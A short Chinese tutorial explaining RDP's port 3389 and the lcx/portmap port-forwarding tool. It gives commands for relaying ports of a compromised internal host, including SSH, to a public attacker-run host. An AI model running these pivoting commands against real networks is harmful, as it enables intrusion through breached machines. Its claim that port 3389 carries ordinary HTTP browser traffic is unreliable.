3389端口
3389端口是指远程桌面协议(RDP)使用的TCP端口。RDP是一种用于远程控制Windows电脑的协议。通过3389端口,用户可以从任何地方使用远程桌面协议连接到目标Windows计算机。这意味着用户可以在不同的设备上远程访问另一个Windows操作系统,就好像在使用本地机器一样。
3389端口的主要用途是通过RDP实现远程控制。通过该端口,用户可以可视化地访问远程计算机的桌面、文件系统和其他相关功能。
除了用于RDP外,3389端口还可以用于其他网络通信,例如网络浏览器的HTTP数据流量。
lcx介绍
lcx有windows版和linux版两个版本,这两个版本的lcx都具有三个功能:
监听;转发;端口转向。
在使用lcx时必须保证两个前提,肉鸡A和攻击机C都能够访问到外网机B;listen监听的端口之前不能被其它程序占用。Linux版的使用与Windows版大同小异,都是先在外网机B进行监听,之后在肉鸡A进行转发,然后在攻击机C进行访问。
不同的是,在转发过程中,Windows版的转发命令”-slave”命令后紧接的是外网机B的ip和端口号,然后再跟肉鸡A的ip和端口号,形如:lcx -slave IP(B) Port(B) IP(A) port(A);而linux版的对应的转发命令形如: ./portmap -m 3 – h1 IP(A) -p1 port(A) -h2 IP(B) -p2 port(B)。portmap为自己编译源文件生成的文件名。linux版的method 2对应的windows版的listen功能,即监听功能,method 1对应的是tran功能,即端口转向功能。我们常用到的是listen功能和转发功能slave。
lcx使用
Windows
内网失陷主机
lcx.exe -slave rhost rport lhost lport
公网代理主机
lcx.exe -listen lport1 lport2Linux
内网失陷主机
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 <公网主机 IP> -p2 4444
公网代理主机
./portmap -m 2 -p1 4444 -h2 <公网主机 IP> -p2 5555
